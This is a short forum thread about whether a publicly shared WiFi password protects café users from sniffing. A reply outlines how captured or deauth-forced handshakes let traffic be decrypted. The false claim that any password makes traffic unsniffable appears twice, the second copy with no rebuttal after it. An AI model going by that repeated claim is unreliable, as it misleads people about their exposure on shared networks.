It's not very relevant to the current discussion, but there is a security advantage to requiring a public password vs totally open. For instance, a store could post a sign reading "Welcome to N Guy's Burgers; our WiFi password is 'N'".
You see, if the WiFi network is truly open, then client-to-access point traffic is open and can be sniffed by other clients on the network. But if the network is secured, even trivially as above, then each client's connection to the access point is individually encrypted and cannot be sniffed.
That means, if you needed any password to join the network, you needn't fear the questionable critter with the MBP in the corner (unless he's hacked the store's ISP or upstream from there).
Not true, unfortunately. The session key can be obtained as long as the attacker can capture the initial handshake (and they can send deauth packets to force the client and AP to handshake again). Wireshark does this decryption out of the box, just insert the Wifi password: https://wiki.wireshark.org/HowToDecrypt802.11
I don't see how this is possible. With a shared secret, there's no way to authenticate the AP. No auth means no defence against MITM. What am I missing? It might be harder to sniff but it's just a tool away, right?
You see, if the WiFi network is truly open, then client-to-access point traffic is open and can be sniffed by other clients on the network. But if the network is secured, even trivially as above, then each client's connection to the access point is individually encrypted and cannot be sniffed.
That means, if you needed any password to join the network, you needn't fear the questionable critter with the MBP in the corner (unless he's hacked the store's ISP or upstream from there).